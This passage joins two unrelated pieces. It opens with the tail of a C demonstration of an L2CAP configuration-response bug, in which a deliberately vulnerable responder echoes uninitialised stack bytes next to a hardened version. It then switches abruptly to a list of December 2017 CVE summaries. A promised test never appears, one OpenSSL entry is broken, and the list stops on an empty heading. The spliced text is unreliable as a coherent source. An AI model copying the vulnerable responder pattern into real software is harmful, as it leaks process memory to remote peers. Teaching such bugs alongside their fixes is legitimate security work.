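    if (walk_options(in, inlen, &efs) < 0) return -1;
    if (outcap < 2 + sizeof efs) return -1;
    out[0] = L2CAP_CONF_EFS;
    out[1] = (uint8_t)sizeof efs;
    memcpy(out + 2, &efs, sizeof efs);                  /* may copy stack contents */
    return (int)(2 + sizeof efs);
}

/* Hardened shape (illustrative): zero the struct so nothing from the stack can
 * leak, and emit the option only if a well-formed one was actually received. */
int build_rsp_hardened(const uint8_t *in, size_t inlen, uint8_t *out, size_t outcap)
{
    struct l2cap_conf_efs efs;
    memset(&efs, 0, sizeof efs);
    int seen = walk_options(in, inlen, &efs);
    if (seen < 0) return -1;
    if (seen == 0) return 0;                            /* nothing to echo back */
    if (outcap < 2 + sizeof efs) return -1;
    out[0] = L2CAP_CONF_EFS;
    out[1] = (uint8_t)sizeof efs;
    memcpy(out + 2, &efs, sizeof efs);
    return (int)(2 + sizeof efs);
}

int main(void)
{
    /* Constructed packet: an EFS option whose length (4) is not sizeof(efs). */
    const uint8_t bad[] = { L2CAP_CONF_EFS, 0x04, 0x01, 0x02, 0x03, 0x04 };
    uint8_t out[64];
    int n = build_rsp_vulnerable(bad, sizeof bad, out, sizeof out);
    printf("vulnerable responder emitted %d bytes:", n);
    for (int i = 0; i < n; i++) printf(" %02x", out[i]);   /* 16 of these are stack bytes */
    printf("\nhardened responder emitted %d bytes\n",
           build_rsp_hardened(bad, sizeof bad, out, sizeof out));
    return 0;
}
```

The test below checks structure rather than the leaked bytes themselves (their values are whatever happened to be on the stack): the vulnerable responder still emits a full 18-byte EFS option for the malformed input, the hardened one emits nothing for it and echoes a well-formed option byte for byte.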
mercurial -- mercurial
In Mercurial before 4.4.1, it is possible that a specially malformed repository can cause Git subrepositories to run arbitrary code in the form of a .git/hooks/post-update script checked into the repository. Typical use of Mercurial prevents construction of such repositories, but they can be created programmatically.
Published: 2017-12-07 | CVSS Score: not yet calculated | Source & Patch Info: CVE-2017-17458 (MISC, MISC, MISC)
microsoft -- malware_protection_engine
The Microsoft Malware Protection Engine running on Microsoft Forefront and Microsoft Defender on Windows 7 SP1, Windows 8.1, Windows RT 8.1, Windows 10 Gold, 1511, 1607, 1703, and 1709, Windows Server 2016, Windows Server, version 1709, and Microsoft Exchange Server 2013 and 2016, does not properly scan a specially crafted file, leading to remote code execution. aka "Microsoft Malware Protection Engine Remote Code Execution Vulnerability".
Published: 2017-12-07 | CVSS Score: not yet calculated | Source & Patch Info: CVE-2017-11937 (BID, SECTRACK, CONFIRM)
microsoft -- malware_protection_engine
The Microsoft Malware Protection Engine running on Microsoft Forefront and Microsoft Defender on Windows 7 SP1, Windows 8.1, Windows RT 8.1, Windows 10 Gold, 1511, 1607, 1703, and 1709, Windows Server 2016, Windows Server, version 1709, and Microsoft Exchange Server 2013 and 2016, does not properly scan a specially crafted file, leading to remote code execution. aka "Microsoft Malware Protection Engine Remote Code Execution Vulnerability". This is different than CVE-2017-11937.
Published: 2017-12-08 | CVSS Score: not yet calculated | Source & Patch Info: CVE-2017-11940 (BID, SECTRACK, CONFIRM)
ikarus -- anti.virus
ntguard_x64.sys 0.18780.0.0 in IKARUS anti.virus 2.16.15 has a NULL pointer dereference via a 0x830000c4 DeviceIoControl request.
Published: 2017-12-04 | CVSS Score: not yet calculated | Source & Patch Info: CVE-2017-17113 (MISC)
ikarus -- anti.virus
ntguard_x64.sys 0.18780.0.0 in IKARUS anti.virus 2.16.15 has a Pool Corruption vulnerability via a 0x83000058 DeviceIoControl request.
Published: 2017-12-04 | CVSS Score: not yet calculated | Source & Patch Info: CVE-2017-17112 (MISC)
ikarus -- anti.virus
ntguard.sys and ntguard_x64.sys 0.18780.0.0 in IKARUS anti.virus 2.16.15 have a Memory Corruption vulnerability via a 0x83000084 DeviceIoControl request.
Published: 2017-12-04 | CVSS Score: not yet calculated | Source & Patch Info: CVE-2017-17114 (MISC)
mistserver -- mistserver
Cross-site scripting (XSS) vulnerability in MistServer before 2.13 allows remote attackers to inject arbitrary web script or HTML via vectors related to failed authentication request alerts.
Published: 2017-12-06 | CVSS Score: not yet calculated | Source & Patch Info: CVE-2017-16884 (MISC, MISC, FULLDISC, CONFIRM, EXPLOIT-DB)
open_ticket_request_system -- open_ticket_request_system
In OTRS 6.0.x up to and including 6.0.1, OTRS 5.0.x up to and including 5.0.24, and OTRS 4.0.x up to and including 4.0.26, an attacker who is logged into OTRS as an agent can manipulate form parameters (related to PGP) and execute arbitrary shell commands with the permissions of the OTRS or web server user.
Published: 2017-12-08 | CVSS Score: not yet calculated | Source & Patch Info: CVE-2017-16921 (CONFIRM)
open_ticket_request_system -- open_ticket_request_system
In Open Ticket Request System (OTRS) through 3.3.20, 4 through 4.0.26, 5 through 5.0.24, and 6 through 6.0.1, an attacker who is logged in as a customer can use the ticket search form to disclose internal article information of their customer tickets.
Published: 2017-12-08 | CVSS Score: not yet calculated | Source & Patch Info: CVE-2017-16854 (CONFIRM)
openafs -- openafs
OpenAFS 1.x before 1.6.22 does not properly validate Rx ack packets, which allows remote attackers to cause a denial of service (system crash or application crash) via crafted fields, as demonstrated by an integer underflow and assertion failure for a small MTU value.
Published: 2017-12-05 | CVSS Score: not yet calculated | Source & Patch Info: CVE-2017-17432 (CONFIRM, CONFIRM)
openjpeg -- openjpeg
In OpenJPEG 2.3.0, a stack-based buffer overflow was discovered in the pgxtoimage function in jpwl/convert.c. The vulnerability causes an out-of-bounds write, which may lead to remote denial of service or possibly remote code execution.
Published: 2017-12-08 | CVSS Score: not yet calculated | Source & Patch Info: CVE-2017-17479 (MISC)
openjpeg -- openjpeg
In OpenJPEG 2.3.0, a stack-based buffer overflow was discovered in the pgxtovolume function in jp3d/convert.c. The vulnerability causes an out-of-bounds write, which may lead to remote denial of service or possibly remote code execution.
Published: 2017-12-08 | CVSS Score: not yet calculated | Source & Patch Info: CVE-2017-17480 (MISC)
openssl -- openssl
OpenSSL 1.0.2 (starting from version 1.0.2b) introduced an "error state" mechanism. The intent was that if a fatal error occurred during a handshake then OpenSSL would move into the error state and would immediately fail if you attempted to continue the handshake. This works as designed for the explicit handshake functions (SSL_do_handshake(), SSL_accept() and SSL_connect()); however, due to a bug it does not work correctly if SSL_read() or SSL_write() is called directly. In that scenario, if the handshake fails then a fatal error will be returned in the initial function call. If SSL_read()/SSL_write() is subsequently called by the application for the same SSL object then it will succeed and the data is passed without being decrypted/encrypted directly from the SSL/TLS record layer. In order to exploit this issue an application bug would have to be present that resulted in a call to SSL_read()/SSL_write() being issued after having already received a fatal error. OpenSSL versions 1.0.2b-1.0.2m are affected. Fixed in OpenSSL 1.0.2n. OpenSSL 1.1.0 is not affected.
Published: 2017-12-07 | CVSS Score: not yet calculated | Source & Patch Info: CVE-2017-3737 (BID, SECTRACK, CONFIRM, CONFIRM)
openssl -- openssl
 
There is an overflow bug in the AVX2 Montgomery multiplication procedure used in exponentiation with 1024-bit moduli. No EC algorithms are affected. Analysis suggests that attacks against RSA and DSA as a result of this defect would be very difficult to perform and are not believed likely. Attacks against DH1024 are considered just feasible, because most of the work necessary to deduce information about a private key may be performed offline. The amount of resources required for such an attack would be significant. However, for an attack on TLS to be meaningful, the server would have to share the DH1024 private key among multiple clients, which is no longer an option since CVE-2016-0701. This only affects processors that support the AVX2 but not ADX extensions like Intel Haswell (4th generation). Note: The impact from this issue is similar to CVE-2017-3736, CVE-2017-3732 and CVE-2015-3193. OpenSSL version 1.0.2-1.0.2m and 1.1.0-1.1.0g are affected. Fixed in OpenSSL 1.0.2n. Due to the low severity of this issue we are not issuing a new release of OpenSSL 1.1.0 at this time. The fix will be included in OpenSSL 1.1.0h when it becomes available. The fix is also available in commit e502cc86d in the OpenSSL git repository.2017-12-07not yet calculatedCVE-2017-3738
BID
SECTRACK
CONFIRM
CONFIRM
openstack/nova -- openstack/nova
An issue was discovered in the default FilterScheduler in OpenStack Nova 16.0.3. By repeatedly rebuilding an instance with new images, an authenticated user may consume untracked resources on a hypervisor host leading to a denial of service, aka doubled resource allocations. This regression was introduced with the fix for OSSA-2017-005 (CVE-2017-16239); however, only Nova stable/pike or later deployments with that fix applied and relying on the default FilterScheduler are affected.
Published: 2017-12-05 | CVSS Score: not yet calculated | CVE-2017-17051
Source & Patch Info: BID, CONFIRM, CONFIRM, CONFIRM, CONFIRM

puppet -- puppet_agent
Versions of Puppet Agent prior to 1.6.0 included a version of the Puppet Execution Protocol (PXP) agent that passed environment variables through to Puppet runs. This could allow unauthorized code to be loaded. This bug was first introduced in Puppet Agent 1.3.0.
Published: 2017-12-06 | CVSS Score: not yet calculated | CVE-2016-5713
Source & Patch Info: CONFIRM

qemu -- qemu
The Virtio Vring implementation in QEMU allows local OS guest users to cause a denial of service (divide-by-zero error and QEMU process crash) by unsetting vring alignment while updating Virtio rings.
Published: 2017-12-06 | CVSS Score: not yet calculated | CVE-2017-17381
Source & Patch Info: MLIST, BID, MLIST

qualcomm -- msm
In Android for MSM, Firefox OS for MSM, QRD Android, with all Android releases from CAF using the Linux kernel, a Use After Free condition can occur during positioning.
Published: 2017-12-05 | CVSS Score: not yet calculated | CVE-2017-11006
Source & Patch Info: BID, CONFIRM

qualcomm -- msm
In Android for MSM, Firefox OS for MSM, QRD Android, with all Android releases from CAF using the Linux kernel, in a graphics driver ioctl handler, the lack of copy_from_user() function calls may result in writes to kernel memory.
Published: 2017-12-05 | CVSS Score: not yet calculated | CVE-2017-11047
Source & Patch Info: CONFIRM

qualcomm -- msm
In Android for MSM, Firefox OS for MSM, QRD Android, with all Android releases from CAF using the Linux kernel, improperly specified offset/size values for a submission command could cause a math operation to overflow and could result in an access to arbitrary memory. The combined pointer will overflow and possibly pass further checks intended to avoid accessing unintended memory.
Published: 2017-12-05 | CVSS Score: not yet calculated | CVE-2017-9698
Source & Patch Info: CONFIRM

qualcomm -- msm
In Android for MSM, Firefox OS for MSM, QRD Android, with all Android releases from CAF using the Linux kernel, while processing the SENDACTIONFRAME IOCTL, a buffer over-read can occur if the payload length is less than 7.
Published: 2017-12-05 | CVSS Score: not yet calculated | CVE-2017-14903
Source & Patch Info: CONFIRM

qualcomm -- msm
In Android for MSM, Firefox OS for MSM, QRD Android, with all Android releases from CAF using the Linux kernel, in a KGSL driver function, a race condition exists which can lead to a Use After Free condition.
Published: 2017-12-05 | CVSS Score: not yet calculated | CVE-2017-11044
Source & Patch Info: CONFIRM

qualcomm -- msm
In Android for MSM, Firefox OS for MSM, QRD Android, with all Android releases from CAF using the Linux kernel, in the GPS location wireless interface, a Use After Free condition can occur.
Published: 2017-12-05 | CVSS Score: not yet calculated | CVE-2017-14918
Source & Patch Info: BID, CONFIRM

qualcomm -- msm
In Android for MSM, Firefox OS for MSM, QRD Android, with all Android releases from CAF using the Linux kernel, ImsService and the IQtiImsExt AIDL APIs are not subject to access control.
Published: 2017-12-05 | CVSS Score: not yet calculated | CVE-2017-11042
Source & Patch Info: CONFIRM

qualcomm -- msm
In Android for MSM, Firefox OS for MSM, QRD Android, with all Android releases from CAF using the Linux kernel, the VIDIOC_G_SDE_ROTATOR_FENCE ioctl command can be used to cause a Use After Free condition.
Published: 2017-12-05 | CVSS Score: not yet calculated | CVE-2017-11031
Source & Patch Info: CONFIRM

qualcomm -- msm
In Android for MSM, Firefox OS for MSM, QRD Android, with all Android releases from CAF using the Linux kernel, the fd allocated during the get_metadata was not closed even though the buffer allocated to the fd was freed. This resulted in a failure during exit sequence.
Published: 2017-12-05 | CVSS Score: not yet calculated | CVE-2017-11019
Source & Patch Info: CONFIRM

qualcomm -- msm
In Android for MSM, Firefox OS for MSM, QRD Android, with all Android releases from CAF using the Linux kernel, there is a memory allocation without a length field validation in the mobicore driver which can result in an undersize buffer allocation. Ultimately this can result in a kernel memory overwrite.
Published: 2017-12-05 | CVSS Score: not yet calculated | CVE-2017-14896
Source & Patch Info: CONFIRM

qualcomm -- msm
In Android for MSM, Firefox OS for MSM, QRD Android, with all Android releases from CAF using the Linux kernel, cryptographic strength is reduced while deriving disk encryption key.
Published: 2017-12-05 | CVSS Score: not yet calculated | CVE-2017-14907
Source & Patch Info: CONFIRM

qualcomm -- msm
In Android for MSM, Firefox OS for MSM, QRD Android, with all Android releases from CAF using the Linux kernel, while processing a specially crafted cfg80211 vendor command, a buffer over-read can occur.
Published: 2017-12-05 | CVSS Score: not yet calculated | CVE-2017-14905
Source & Patch Info: CONFIRM

qualcomm -- msm
In Android for MSM, Firefox OS for MSM, QRD Android, with all Android releases from CAF using the Linux kernel, the SafeSwitch test application does not properly validate the number of blocks to verify.
Published: 2017-12-05 | CVSS Score: not yet calculated | CVE-2017-14908
Source & Patch Info: BID, CONFIRM

qualcomm -- msm
In Android for MSM, Firefox OS for MSM, QRD Android, with all Android releases from CAF using the Linux kernel, while handling the QSEOS_RPMB_CHECK_PROV_STATUS_COMMAND, a userspace buffer is directly accessed in kernel space.
Published: 2017-12-05 | CVSS Score: not yet calculated | CVE-2017-14897
Source & Patch Info: BID, CONFIRM

qualcomm -- msm
In Android for MSM, Firefox OS for MSM, QRD Android, with all Android releases from CAF using the Linux kernel, IOCTL interface to send QMI NOTIFY REQ messages can be called from multiple contexts which can result in buffer overflow of msg cache.
Published: 2017-12-05 | CVSS Score: not yet calculated | CVE-2017-9710
Source & Patch Info: CONFIRM

qualcomm -- msm
In Android for MSM, Firefox OS for MSM, QRD Android, with all Android releases from CAF using the Linux kernel, in a video driver, a race condition exists which can potentially lead to a buffer overflow.
Published: 2017-12-05 | CVSS Score: not yet calculated | CVE-2017-11049
Source & Patch Info: CONFIRM

qualcomm -- msm
In Android for MSM, Firefox OS for MSM, QRD Android, with all Android releases from CAF using the Linux kernel, while processing the QCA_NL80211_VENDOR_SUBCMD_GET_CHAIN_RSSI vendor command, in which attribute QCA_WLAN_VENDOR_ATTR_MAC_ADDR contains fewer than 6 bytes, a buffer overrun occurs.
Published: 2017-12-05 | CVSS Score: not yet calculated | CVE-2017-14900
Source & Patch Info: CONFIRM

qualcomm -- msm
In Android for MSM, Firefox OS for MSM, QRD Android, with all Android releases from CAF using the Linux kernel, buffer sizes in the message passing interface are not properly validated.
Published: 2017-12-05 | CVSS Score: not yet calculated | CVE-2017-14916
Source & Patch Info: BID, CONFIRM

qualcomm -- msm
In Android for MSM, Firefox OS for MSM, QRD Android, with all Android releases from CAF using the Linux kernel, due to a race condition in the GLink kernel driver, a Use After Free condition can potentially occur.
Published: 2017-12-05 | CVSS Score: not yet calculated | CVE-2017-14902
Source & Patch Info: BID, CONFIRM

qualcomm -- msm
In Android for MSM, Firefox OS for MSM, QRD Android, with all Android releases from CAF using the Linux kernel, while processing the QCA_NL80211_VENDOR_SUBCMD_SET_TXPOWER_SCALE vendor command, in which attribute QCA_WLAN_VENDOR_ATTR_TXPOWER_SCALE contains fewer than 1 byte, a buffer overrun occurs.
Published: 2017-12-05 | CVSS Score: not yet calculated | CVE-2017-14901
Source & Patch Info: CONFIRM

qualcomm -- msm
In Android for MSM, Firefox OS for MSM, QRD Android, with all Android releases from CAF using the Linux kernel, while processing the QCA_NL80211_VENDOR_SUBCMD_SET_TXPOWER_SCALE_DECR_DB vendor command, in which attribute QCA_WLAN_VENDOR_ATTR_TXPOWER_SCALE_DECR_DB contains fewer than 1 byte, a buffer overrun occurs.
Published: 2017-12-05 | CVSS Score: not yet calculated | CVE-2017-14899
Source & Patch Info: CONFIRM

qualcomm -- msm
In Android for MSM, Firefox OS for MSM, QRD Android, with all Android releases from CAF using the Linux kernel, a count value that is read from a file is not properly validated.
Published: 2017-12-05 | CVSS Score: not yet calculated | CVE-2017-14909
Source & Patch Info: BID, CONFIRM

qualcomm -- msm
In Android for MSM, Firefox OS for MSM, QRD Android, with all Android releases from CAF using the Linux kernel, while processing the QCA_NL80211_VENDOR_SUBCMD_SET_TXPOWER_SCALE vendor command, in which attribute QCA_WLAN_VENDOR_ATTR_TXPOWER_SCALE contains fewer than 1 byte, a buffer overrun occurs.
Published: 2017-12-05 | CVSS Score: not yet calculated | CVE-2017-14898
Source & Patch Info: CONFIRM

qualcomm -- msm
In Android for MSM, Firefox OS for MSM, QRD Android, with all Android releases from CAF using the Linux kernel, a crafted binder request can cause an arbitrary unmap in MediaServer.
Published: 2017-12-05 | CVSS Score: not yet calculated | CVE-2017-14904
Source & Patch Info: BID, CONFIRM

qualcomm -- msm
In Android for MSM, Firefox OS for MSM, QRD Android, with all Android releases from CAF using the Linux kernel, buffer overwrite is possible in fw_name_store if image name is 64 characters.
Published: 2017-12-05 | CVSS Score: not yet calculated | CVE-2017-9700
Source & Patch Info: CONFIRM

qualcomm -- msm
In Android for MSM, Firefox OS for MSM, QRD Android, with all Android releases from CAF using the Linux kernel, after a subsystem reset, iwpriv is not giving correct information.
Published: 2017-12-05 | CVSS Score: not yet calculated | CVE-2017-14895
Source & Patch Info: BID, CONFIRM

qualcomm -- msm
In Android for MSM, Firefox OS for MSM, QRD Android, with all Android releases from CAF using the Linux kernel, in the HDMI video driver function hdmi_edid_sysfs_rda_res_info(), userspace can perform an arbitrary write into kernel memory.
Published: 2017-12-05 | CVSS Score: not yet calculated | CVE-2017-11030
Source & Patch Info: CONFIRM

qualcomm -- msm
In Android for MSM, Firefox OS for MSM, QRD Android, with all Android releases from CAF using the Linux kernel, a race condition in a multimedia driver can potentially lead to a buffer overwrite.
Published: 2017-12-05 | CVSS Score: not yet calculated | CVE-2017-9718
Source & Patch Info: CONFIRM

qualcomm -- msm
In Android for MSM, Firefox OS for MSM, QRD Android, with all Android releases from CAF using the Linux kernel, when updating custom EDID (hdmi_tx_sysfs_wta_edid), if edid_size, which is controlled by userspace, is too large, a buffer overflow occurs.
Published: 2017-12-05 | CVSS Score: not yet calculated | CVE-2017-9722
Source & Patch Info: CONFIRM

qualcomm -- msm
In Android for MSM, Firefox OS for MSM, QRD Android, with all Android releases from CAF using the Linux kernel, in the coresight-tmc driver, a simultaneous read and enable of the ETR device after changing the buffer size may result in a Use After Free condition of the previous buffer.
Published: 2017-12-05 | CVSS Score: not yet calculated | CVE-2017-11033
Source & Patch Info: CONFIRM

qualcomm -- msm
In Android for MSM, Firefox OS for MSM, QRD Android, with all Android releases from CAF using the Linux kernel, in the camera driver, the function "msm_ois_power_down" is called without a mutex and a race condition can occur in variable "*reg_ptr" of sub function "msm_camera_config_single_vreg".
Published: 2017-12-05 | CVSS Score: not yet calculated | CVE-2017-9708
Source & Patch Info: CONFIRM

qualcomm -- msm
In Android for MSM, Firefox OS for MSM, QRD Android, with all Android releases from CAF using the Linux kernel, the qbt1000 driver implements an alternative channel for usermode applications to talk to QSEE applications.
Published: 2017-12-05 | CVSS Score: not yet calculated | CVE-2017-9716
Source & Patch Info: BID, CONFIRM

qualcomm -- msm
In Android for MSM, Firefox OS for MSM, QRD Android, with all Android releases from CAF using the Linux kernel, in a camera driver function, a race condition exists which can lead to a Use After Free condition.
Published: 2017-12-05 | CVSS Score: not yet calculated | CVE-2017-11045
Source & Patch Info: CONFIRM

qualcomm -- msm
In Android for MSM, Firefox OS for MSM, QRD Android, with all Android releases from CAF using the Linux kernel, a privilege escalation vulnerability exists in telephony.
Published: 2017-12-05 | CVSS Score: not yet calculated | CVE-2017-9709
Source & Patch Info: CONFIRM

qualcomm -- msm
In Android for MSM, Firefox OS for MSM, QRD Android, with all Android releases from CAF using the Linux kernel, in the processing of a downlink supplementary services message, a buffer overflow can occur.
Published: 2017-12-05 | CVSS Score: not yet calculated | CVE-2017-6211
Source & Patch Info: BID, CONFIRM

qualcomm -- msm
In Android for MSM, Firefox OS for MSM, QRD Android, with all Android releases from CAF using the Linux kernel, a race condition in a Camera driver can lead to a Use After Free condition.
Published: 2017-12-05 | CVSS Score: not yet calculated | CVE-2017-9703
Source & Patch Info: CONFIRM

qualcomm -- msm
In Android for MSM, Firefox OS for MSM, QRD Android, with all Android releases from CAF using the Linux kernel, there is a possibility of stack corruption due to buffer overflow of Partition name while converting ascii string to unicode string in function HandleMetaImgFlash.
Published: 2017-12-05 | CVSS Score: not yet calculated | CVE-2017-11007
Source & Patch Info: BID, CONFIRM

qualcomm -- msm
In Android for MSM, Firefox OS for MSM, QRD Android, with all Android releases from CAF using the Linux kernel, in a WiFi driver function, an integer overflow leading to heap buffer overflow may potentially occur.
Published: 2017-12-05 | CVSS Score: not yet calculated | CVE-2017-11043
Source & Patch Info: BID, CONFIRM

qualcomm -- msm
In Android for MSM, Firefox OS for MSM, QRD Android, with all Android releases from CAF using the Linux kernel, a Use After Free condition can occur during a deinitialization path.
Published: 2017-12-05 | CVSS Score: not yet calculated | CVE-2017-11005
Source & Patch Info: BID, CONFIRM

qualcomm -- msm
In Android for MSM, Firefox OS for MSM, QRD Android, with all Android releases from CAF using the Linux kernel, buffer sizes in the message passing interface are not properly validated.
Published: 2017-12-05 | CVSS Score: not yet calculated | CVE-2017-14917
Source & Patch Info: BID, CONFIRM

qualcomm -- msm
In Android for MSM, Firefox OS for MSM, QRD Android, with all Android releases from CAF using the Linux kernel, when memory allocation fails while creating a calibration block in create_cal_block, stale pointers are left uncleared.
Published: 2017-12-05 | CVSS Score: not yet calculated | CVE-2017-11016
Source & Patch Info: CONFIRM

qualcomm -- msm
In Android for MSM, Firefox OS for MSM, QRD Android, with all Android releases from CAF using the Linux kernel, handles in the global client structure can become stale.
Published: 2017-12-05 | CVSS Score: not yet calculated | CVE-2017-14914
Source & Patch Info: BID, CONFIRM

qualcomm -- msm
In Android for MSM, Firefox OS for MSM, QRD Android, with all Android releases from CAF using the Linux kernel, a buffer overflow can occur while reading firmware logs.
Published: 2017-12-05 | CVSS Score: not yet calculated | CVE-2017-15813
Source & Patch Info: CONFIRM

red_hat -- red_hat_enterprise_linux
A non-privileged user is able to mount a fuse filesystem on RHEL 6 or 7 and crash a system if an application punches a hole in a file that does not end aligned to a page boundary.
Published: 2017-12-06 | CVSS Score: not yet calculated | CVE-2017-15121
Source & Patch Info: CONFIRM

rsync -- rsync
The daemon in rsync 3.1.2, and 3.1.3-development before 2017-12-03, does not check for fnamecmp filenames in the daemon_filter_list data structure (in the recv_files function in receiver.c) and also does not apply the sanitize_paths protection mechanism to pathnames found in "xname follows" strings (in the read_ndx_and_attrs function in rsync.c), which allows remote attackers to bypass intended access restrictions.
Published: 2017-12-05 | CVSS Score: not yet calculated | CVE-2017-17434
Source & Patch Info: MISC, MISC

rsync -- rsync
The recv_files function in receiver.c in the daemon in rsync 3.1.2, and 3.1.3-development before 2017-12-03, proceeds with certain file metadata updates before checking for a filename in the daemon_filter_list data structure, which allows remote attackers to bypass intended access restrictions.
Published: 2017-12-05 | CVSS Score: not yet calculated | CVE-2017-17433
Source & Patch Info: MISC

sangoma -- netborder_session_controller
Sangoma NetBorder / Vega Session Controller before 2.3.12-80-GA allows remote attackers to execute arbitrary commands via the web interface.
Published: 2017-12-07 | CVSS Score: not yet calculated | CVE-2017-17430
Source & Patch Info: CONFIRM

sap -- business_objects_financial_consolidation
Cross-Site Scripting (XSS) exists in SAP Business Objects Financial Consolidation before 2017-06-13, aka SAP Security Note 2422292.
Published: 2017-12-03 | CVSS Score: not yet calculated | CVE-2017-14516
Source & Patch Info: CONFIRM

synology -- calendar
Improper access control vulnerability in SYNO.Cal.EventBase in Synology Calendar before 2.0.1-0242 allows remote authenticated users to modify calendar event via unspecified vectors.
Published: 2017-12-08 | CVSS Score: not yet calculated | CVE-2017-15891
Source & Patch Info: CONFIRM

synology -- diskstation_manager
Command injection vulnerability in smart.cgi in Synology DiskStation Manager (DSM) before 5.2-5967-5 allows remote authenticated users to execute arbitrary commands via disk field.
Published: 2017-12-04 | CVSS Score: not yet calculated | CVE-2017-15889
Source & Patch Info: CONFIRM

synology -- diskstation_manager
Directory traversal vulnerability in the SYNO.FileStation.Extract in Synology DiskStation Manager (DSM) 6.0.x before 6.0.3-8754-3 and before 5.2-5967-6 allows remote authenticated users to write arbitrary files via the dest_folder_path parameter.
Published: 2017-12-08 | CVSS Score: not yet calculated | CVE-2017-15894
Source & Patch Info: CONFIRM

synology -- file_station
Directory traversal vulnerability in the SYNO.FileStation.Extract in Synology File Station before 1.1.1-0099 allows remote authenticated users to write arbitrary files via the dest_folder_path parameter.
Published: 2017-12-08 | CVSS Score: not yet calculated | CVE-2017-15893
Source & Patch Info: CONFIRM

synology -- photo_station
Files or directories accessible to external parties vulnerability in picasa.php in Synology Photo Station before 6.8.1-3458 and before 6.3-2970 allows remote attackers to obtain arbitrary files via prog_id field.
Published: 2017-12-04 | CVSS Score: not yet calculated | CVE-2017-12079
Source & Patch Info: CONFIRM

synology -- photo_station
An information exposure vulnerability in default HTTP configuration file in Synology Photo Station before 6.8.1-3458 and before 6.3-2970 allows remote attackers to obtain sensitive system information via .htaccess file.
Published: 2017-12-04 | CVSS Score: not yet calculated | CVE-2017-12080
Source & Patch Info: CONFIRM

synology -- router_manager
Directory traversal vulnerability in the SYNO.FileStation.Extract in Synology Router Manager (SRM) before 1.1.5-6542-4 allows remote authenticated users to write arbitrary files via the dest_folder_path parameter.
Published: 2017-12-08 | CVSS Score: not yet calculated | CVE-2017-15895
Source & Patch Info: CONFIRM

tg_soft -- vir.it_explorer_lite
TG Soft Vir.IT eXplorer Lite 8.5.42 allows local users to cause a denial of service (BSOD) or possibly have unspecified other impact via a \\.\Viragtlt DeviceIoControl request of 0x82730050.
Published: 2017-12-08 | CVSS Score: not yet calculated | CVE-2017-17473
Source & Patch Info: MISC

tg_soft -- vir.it_explorer_lite
TG Soft Vir.IT eXplorer Lite 8.5.42 allows local users to cause a denial of service (BSOD) or possibly have unspecified other impact via a \\.\Viragtlt DeviceIoControl request of 0x82736068.
Published: 2017-12-08 | CVSS Score: not yet calculated | CVE-2017-17475
Source & Patch Info: MISC

tg_soft -- vir.it_explorer_lite
TG Soft Vir.IT eXplorer Lite 8.5.42 allows local users to cause a denial of service (BSOD) or possibly have unspecified other impact via a \\.\Viragtlt DeviceIoControl request of 0x82732140.
Published: 2017-12-08 | CVSS Score: not yet calculated | CVE-2017-17471
Source & Patch Info: MISC

tg_soft -- vir.it_explorer_lite
TG Soft Vir.IT eXplorer Lite 8.5.42 allows local users to gain privileges or cause a denial of service (Arbitrary Write) via a \\.\Viragtlt DeviceIoControl request of 0x82730088.
Published: 2017-12-08 | CVSS Score: not yet calculated | CVE-2017-17466
Source & Patch Info: MISC

tg_soft -- vir.it_explorer_lite
TG Soft Vir.IT eXplorer Lite 8.5.42 allows local users to cause a denial of service (BSOD) or possibly have unspecified other impact via a \\.\Viragtlt DeviceIoControl request of 0x82730070.
Published: 2017-12-08 | CVSS Score: not yet calculated | CVE-2017-17474
Source & Patch Info: MISC

tg_soft -- vir.it_explorer_lite
TG Soft Vir.IT eXplorer Lite 8.5.42 allows local users to cause a denial of service (BSOD) or possibly have unspecified other impact via a \\.\Viragtlt DeviceIoControl request of 0x82730074.
Published: 2017-12-08 | CVSS Score: not yet calculated | CVE-2017-17467
Source & Patch Info: MISC

tg_soft -- vir.it_explorer_lite
TG Soft Vir.IT eXplorer Lite 8.5.42 allows local users to cause a denial of service (BSOD) or possibly have unspecified other impact via a \\.\Viragtlt DeviceIoControl request of 0x82730030.
Published: 2017-12-08 | CVSS Score: not yet calculated | CVE-2017-17472
Source & Patch Info: MISC

tg_soft -- vir.it_explorer_lite
TG Soft Vir.IT eXplorer Lite 8.5.42 allows local users to gain privileges or cause a denial of service (Arbitrary Write) via a \\.\Viragtlt DeviceIoControl request of 0x82730020, a different vulnerability than CVE-2017-17050.
Published: 2017-12-08 | CVSS Score: not yet calculated | CVE-2017-17468
Source & Patch Info: MISC

tg_soft -- vir.it_explorer_lite
TG Soft Vir.IT eXplorer Lite 8.5.42 allows local users to cause a denial of service (BSOD) or possibly have unspecified other impact via a \\.\Viragtlt DeviceIoControl request of 0x82730054.
Published: 2017-12-08 | CVSS Score: not yet calculated | CVE-2017-17470
Source & Patch Info: MISC

tg_soft -- vir.it_explorer_lite
TG Soft Vir.IT eXplorer Lite 8.5.42 allows local users to cause a denial of service (BSOD) or possibly have unspecified other impact via a \\.\Viragtlt DeviceIoControl request of 0x82730008, a different vulnerability than CVE-2017-16948.
Published: 2017-12-08 | CVSS Score: not yet calculated | CVE-2017-17469
Source & Patch Info: MISC

tor -- tor
In Tor before 0.2.5.16, 0.2.6 through 0.2.8 before 0.2.8.17, 0.2.9 before 0.2.9.14, 0.3.0 before 0.3.0.13, and 0.3.1 before 0.3.1.9, relays (that have incompletely downloaded descriptors) can pick themselves in a circuit path, leading to a degradation of anonymity, aka TROVE-2017-012.
Published: 2017-12-03 | CVSS Score: not yet calculated | CVE-2017-8822
Source & Patch Info: CONFIRM, CONFIRM, CONFIRM, DEBIAN

tor -- tor
In Tor before 0.2.5.16, 0.2.6 through 0.2.8 before 0.2.8.17, 0.2.9 before 0.2.9.14, 0.3.0 before 0.3.0.13, and 0.3.1 before 0.3.1.9, remote attackers can cause a denial of service (NULL pointer dereference and application crash) against directory authorities via a malformed descriptor, aka TROVE-2017-010.
Published: 2017-12-03 | CVSS Score: not yet calculated | CVE-2017-8820
Source & Patch Info: CONFIRM, CONFIRM, DEBIAN

tor -- tor
In Tor before 0.2.5.16, 0.2.6 through 0.2.8 before 0.2.8.17, 0.2.9 before 0.2.9.14, 0.3.0 before 0.3.0.13, and 0.3.1 before 0.3.1.9, there is a use-after-free in onion service v2 during intro-point expiration because the expiring list is mismanaged in certain error cases, aka TROVE-2017-013.
Published: 2017-12-03 | CVSS Score: not yet calculated | CVE-2017-8823
Source & Patch Info: CONFIRM, CONFIRM, CONFIRM, DEBIAN

tor -- tor
